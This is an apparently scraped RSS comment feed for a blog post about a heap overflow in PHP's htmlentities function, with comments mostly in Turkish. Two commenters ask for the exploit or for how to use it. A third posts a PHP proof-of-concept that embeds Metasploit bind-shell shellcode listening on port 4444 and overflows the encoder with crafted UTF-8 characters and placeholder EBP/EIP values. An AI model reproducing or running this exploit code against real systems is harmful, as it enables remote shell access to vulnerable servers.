PoC / Exploit for PHP HTML Entity Encoder Heap Overflow Vulnerability - Crash/DoS? - Yorumlar Ferruh Mavituna - Me, Myself and My Alter Ego... Ferruh Mavituna http://ferruh.mavituna.com Paz, 12 Şub 2012 19:39:27 +0200 Ferruh Mavituna http://ferruh.mavituna.com http://ferruh.mavituna.com/rss/rss.gif isooo http://ferruh.mavituna.com/poc-exploit-for-php-html-entity-encoder-heap-overflow-vulnerability-crash-dos-oku/ isooo Cmt, 14 Mar 2009 15:27:43 +0200 Bu acikdan nasil faydalaniliniyor onuda anlatirmisini bi zahmet? Tr4c3 http://ferruh.mavituna.com/poc-exploit-for-php-html-entity-encoder-heap-overflow-vulnerability-crash-dos-oku/ Tr4c3 Sal, 26 Ara 2006 10:05:22 +0200 May you sent the EXP for PoC / Exploit for PHP HTML Entity Encoder Heap Overflow Vulnerability to me,Please<br />THX in advance.Lol Tontonq http://ferruh.mavituna.com/poc-exploit-for-php-html-entity-encoder-heap-overflow-vulnerability-crash-dos-oku/ Tontonq Cum, 01 Ara 2006 19:48:55 +0200 &lt;?<br />$fuzzFixed=&quot;A&quot;;<br />#/* linux_ia32_bind - LPORT=4444 Size=108 Encoder=PexFnstenvSub<a href="http://metasploit.com">http://metasploit.com</a> */<br />$shellcode =<br />&quot;\x2b\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x64&quot;<br />&quot;\xb4\xc7\x69\x83\xeb\xfc\xe2\xf4\x55\x6f\x94\x2a\x37\xde\xc5\x03&quot;<br />&quot;\x02\xec\x5e\xe0\x85\x79\x47\xff\x27\xe6\xa1\x01\x75\xe8\xa1\x3a&quot;<br />&quot;\xed\x55\xad\x0f\x3c\xe4\x96\x3f\xed\x55\x0a\xe9\xd4\xd2\x16\x8a&quot;<br />&quot;\xa9\x34\x95\x3b\x32\xf7\x4e\x88\xd4\xd2\x0a\xe9\xf7\xde\xc5\x30&quot;<br />&quot;\xd4\x8b\x0a\xe9\x2d\xcd\x3e\xd9\x6f\xe6\xaf\x46\x4b\xc7\xaf\x01&quot;<br />&quot;\x4b\xd6\xae\x07\xed\x57\x95\x3a\xed\x55\x0a\xe9&quot;;<br /><br />echo &quot;hmm&quot;;<br /><br />for($pl=0; $pl&lt;63; $pl++)<br />$fuzzFixed .= code2utf(977);<br />if($pl == &quot;63&quot;) { <br />$fuzzFixed .= &quot;BBBB&quot;; #jump to ebp<br />$fuzzFixed .= &quot;CCCC&quot;; #ahh eip<br />$fuzzFixed .= &quot;$shellcode&quot;;<br /> }<br />htmlentities($fuzzFixed , ENT_NOQUOTES, &quot;utf-8&quot; );<br /><br />function code2utf($num){<br />return chr(($num&gt;&gt;6)+192).chr(($num&amp;63)+128);<br />}<br /><br />echo &quot;ehm...&quot;;<br />?&gt;<br />